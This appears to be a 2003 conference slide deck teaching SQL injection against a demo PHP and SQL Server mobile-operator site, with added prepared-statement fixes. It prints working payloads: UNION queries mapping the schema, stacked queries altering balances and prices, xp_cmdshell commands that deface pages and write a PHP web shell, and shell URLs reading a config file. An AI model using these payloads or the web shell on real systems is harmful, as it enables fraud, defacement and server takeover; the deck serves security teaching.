Exploiting Web applications SQL Injection
SQL Injection
FIST Conference, October 2003
© Rafael San Miguel Carrasco
Scenario:
Windows 2000 Professional
Apache Win32 1.3.28
PHP 4.3.3
SQL Server 2000
HTML documents and PHP scripts
Mobile operator, online services:
balance enquiry
subscribing to teleservices
Both work through a secret identifier assigned to each customer, which is used to look up information and as the means of payment.
consultasaldo.php:

```php
<?php
// consultasaldo.php as shown in the slides: $idcliente (taken from the request)
// is concatenated straight into the SQL text, which is the injection point.
$query = "SELECT nombre, apellidos, saldo FROM clientes WHERE id='$idcliente';";
$result = mssql_query($query);
$nfilas = mssql_num_rows($result);
while ($row = mssql_fetch_array($result)) {
    echo "Nombre del cliente: <b>" . $row[0] . " " . $row[1] . "</b><br>";
    echo "Saldo actual: <b>" . $row[2] . "</b>";
}
```
contratar.php:

```php
<?php
// contratar.php as shown in the slides: $idservicio and $idcliente (taken from
// the request) go straight into the SQL text, and $idservicio is also used to
// build a column name (servicio<N>), so there are three injection points.
$query = "SELECT * FROM servicios WHERE id='$idservicio';";
$result = mssql_query($query);
$row = mssql_fetch_array($result);
$precio = $row[3];
echo "El precio del servicio que desea contratar es de <b>$precio</b> euros<br>";
// $saldo_actual is the customer's current balance as known to the script
$saldo_final = $saldo_actual - $precio;
$query = "UPDATE clientes SET saldo=$saldo_final WHERE id='$idcliente';";
mssql_query($query);
$query = "UPDATE clientes SET servicio" . $idservicio . "=1 WHERE id='$idcliente';";
mssql_query($query);
```
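As an added example (not code from the original slides), here are both scripts rewritten with PDO prepared statements so that no request value ever becomes part of the SQL text. It assumes `$pdo` is an open PDO connection through the pdo_sqlsrv driver, the table and column names used in the deck, and a hypothetical whitelist of the `servicio<N>` columns, since identifiers cannot be bound as parameters.

```php
<?php
// Added example (not code from the slides): hardened consultasaldo.php and
// contratar.php using PDO prepared statements. Assumed: $pdo is a PDO handle
// opened with the pdo_sqlsrv driver and ERRMODE_EXCEPTION, and the table and
// column names are the ones the deck shows (clientes, servicios, saldo, precio).

// Accept only a positive integer; anything else never reaches the database.
function idValido(string $raw): int {
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) { throw new InvalidArgumentException('invalid id'); }
    return $id;
}

// consultasaldo.php: the id travels as a bound parameter, not as SQL text.
function consultaSaldo(PDO $pdo, string $rawIdCliente): ?array {
    $st = $pdo->prepare('SELECT nombre, apellidos, saldo FROM clientes WHERE id = ?');
    $st->execute([idValido($rawIdCliente)]);
    $fila = $st->fetch(PDO::FETCH_ASSOC);
    return $fila === false ? null : $fila;
}

// contratar.php: column names cannot be bound, so the servicio<N> column comes
// from a fixed (hypothetical) whitelist keyed by service id; price lookup and
// balance deduction run inside one transaction with a single conditional UPDATE.
const COLUMNAS_SERVICIO = [1 => 'servicio1', 2 => 'servicio2', 3 => 'servicio3'];

function contratar(PDO $pdo, string $rawIdCliente, string $rawIdServicio): bool {
    $idCliente  = idValido($rawIdCliente);
    $idServicio = idValido($rawIdServicio);
    $columna = COLUMNAS_SERVICIO[$idServicio] ?? throw new InvalidArgumentException('unknown service');
    $pdo->beginTransaction();
    try {
        $st = $pdo->prepare('SELECT precio FROM servicios WHERE id = ?');
        $st->execute([$idServicio]);
        $precio = $st->fetchColumn();
        if ($precio === false) { throw new RuntimeException('unknown service'); }
        // Deduct only when the balance covers the price; the balance is read by the
        // database itself, never from a client-supplied $saldo_actual.
        $st = $pdo->prepare("UPDATE clientes SET saldo = saldo - ?, $columna = 1 WHERE id = ? AND saldo >= ?");
        $st->execute([$precio, $idCliente, $precio]);
        $ok = $st->rowCount() === 1;
        $ok ? $pdo->commit() : $pdo->rollBack();
        return $ok;
    } catch (Throwable $e) {
        if ($pdo->inTransaction()) { $pdo->rollBack(); }
        throw $e;
    }
}
```

Because the UPDATE's WHERE clause re-checks `saldo >= precio`, a request with an insufficient balance simply affects zero rows and the transaction is rolled back.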
Mapping the database:
the tables that make up the database
the list and type of each table's columns
5' AND 1=0 union select TABLE_NAME from INFORMATION_SCHEMA.TABLES—
Warning: mssql_query(): message: Todas las consultas de una instruccion SQL que contenga un operador UNION deben tener el mismo numero de expresiones en sus listas de destino. (severity 16) in c:\apache\htdocs\consultasaldo.php on line 21
5' AND 1=0 union select TABLE_NAME," ",1 from INFORMATION_SCHEMA.TABLES--
5' AND 1=0 union select TABLE_NAME, COLUMN_NAME,1 from INFORMATION_SCHEMA.COLUMNS
5' AND 1=0 union select TABLE_NAME, COLUMN_NAME,type from syscolumns, INFORMATION_SCHEMA.COLUMNS—
5' AND 1=0; update clientes set saldo=500000 where id=5555--
5556'; update servicios set precio=1 where nombre_servicio="llamada en espera"—
Warning: mssql_query(): message: Linea 1: sintaxis incorrecta cerca de '—'. (severity 15) in c:\apache\htdocs\contratar.php on line 22
Warning: mssql_query(): message: Comilla no cerrada antes de la cadena de caracteres ';'. (severity 15) in c:\apache\htdocs\contratar.php on line 22
5' AND 1=0; exec master..xp_cmdshell 'echo "<html> <body><img src=http://www.geocities.com/clan_de_vampiros/Caminante.gif> <br>hackedwebpage!</body></html>" > c:\apache\htdocs\deface.htm'—
5556'; exec master..xp_cmdshell 'copy c:\apache\htdocs\deface.htm c:\apache\htdocs\principal.htm'—
shell.php:

```php
<html><body><?php
$comando = $_GET["comando"];
echo "$comando<br>";
$resultado = system($comando);
echo $resultado;
?></body></html>
```

Or alternatively: passthru()
5556'; exec master..xp_cmdshell 'echo "<html><body><?php $comando=$_GET["comando"];echo $comando;$resultado = system ($comando);echo $resultado;?></body></html>" > c:\apache\htdocs\shell.php'--
http://127.0.0.1/shell.php?comando=dir..
http://127.0.0.1/shell.php?comando=type c:\odbc.conf
In php.ini:

```ini
; Magic quotes for incoming
; GET/POST/Cookie data.
magic_quotes_gpc = On / Off
```

However, with numeric fields this protection is useless.
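An added example, not from the original deck, showing why the numeric case defeats magic quotes: addslashes() is applied to the id exactly as magic_quotes_gpc would apply it, first in a query that compares the id unquoted, then replaced by integer validation. The query strings and the constructed inputs are illustrative; the function names are hypothetical.

```php
<?php
// Added example (not code from the slides): why magic_quotes_gpc does not help
// when the value lands in a numeric context. addslashes() is what magic quotes
// applies to request data; it only rewrites quotes, backslashes and NUL bytes.

// Query shape from consultasaldo.php, but with the id compared as a number.
function consultaConMagicQuotes(string $rawId): string {
    $id = addslashes($rawId);               // magic_quotes_gpc = On, nothing more
    return "SELECT nombre, apellidos, saldo FROM clientes WHERE id=$id";
}

// Hardened: the only thing allowed into the SQL text is a validated integer.
function consultaValidada(string $rawId): ?string {
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;                         // reject the request (HTTP 400) and log it
    }
    return "SELECT nombre, apellidos, saldo FROM clientes WHERE id=$id";
}

// Constructed inputs: a plain id and the slide's "5 AND 1=0" shape, which
// contains no quote character for addslashes() to touch.
foreach (['5', '5 AND 1=0'] as $raw) {
    printf("input %-12s magic quotes -> %s\n", "'$raw'", consultaConMagicQuotes($raw));
    printf("input %-12s validation   -> %s\n", "'$raw'", consultaValidada($raw) ?? 'rejected');
}
// Note for SQL Server: addslashes() escapes with a backslash, which T-SQL does not
// treat as an escape character inside string literals, so it is not a reliable
// protection for quoted (string) contexts either; bind parameters instead.
```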
Madrid, 25 October 2003
FIST Conference October 2003
© Rafael San Miguel Carrasco